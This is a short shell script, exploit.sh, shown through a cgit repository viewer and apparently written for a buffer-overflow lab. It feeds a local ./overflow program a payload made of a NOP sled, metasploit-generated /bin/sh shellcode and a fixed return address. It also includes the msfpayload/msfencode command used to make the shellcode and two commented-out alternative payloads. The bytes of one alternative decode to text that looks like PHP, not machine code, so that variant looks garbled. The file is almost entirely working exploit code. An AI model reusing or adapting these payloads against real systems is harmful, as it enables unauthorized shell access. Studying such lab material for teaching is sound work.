aboutsummaryrefslogtreecommitdiff
path: root/exploit.sh
blob: 2253e3019d6bb2a584100dab202868708272101e (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14

#!/bin/sh

# shellcode generated with metasploit (exec /bin/sh):
#   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'

# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr

./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'`

# shellcode/simple.c
#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'`

# shellcode/simple2.c (257 bytes)
#./overflow `python -c 'print "\x90"*117 + "\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x53\x49\x31\x30\x4a\x50\x71\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x67\x41\x41\x41\x4c\x6f\x47\x41\x41\x41\x41\x75\x41\x51\x41\x41\x41\x49\x50\x42\x63\x4e\x51\x36\x4f\x50\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x72\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x51\x41\x55\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x46\x36\x55\x67\x41\x42\x65\x42\x41\x42\x47\x77\x77\x48\x43\x4a\x41\x42\x41\x41\x41\x55\x41\x41\x41\x41\x48\x41\x41\x41\x41\x4d\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x58\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x55\x41\x41\x41\x41\x4e\x41\x41\x41\x41\x4c\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x49\x41\x41\x41\x41\x41\x45\x45\x4f\x45\x41\x41\x41\x41\x41\x41\x29\x29\x3b" + "\x90"*104 + "\x8c\xd3\xff\xff"'`
Powered by cgit, Themed by Ted Yin.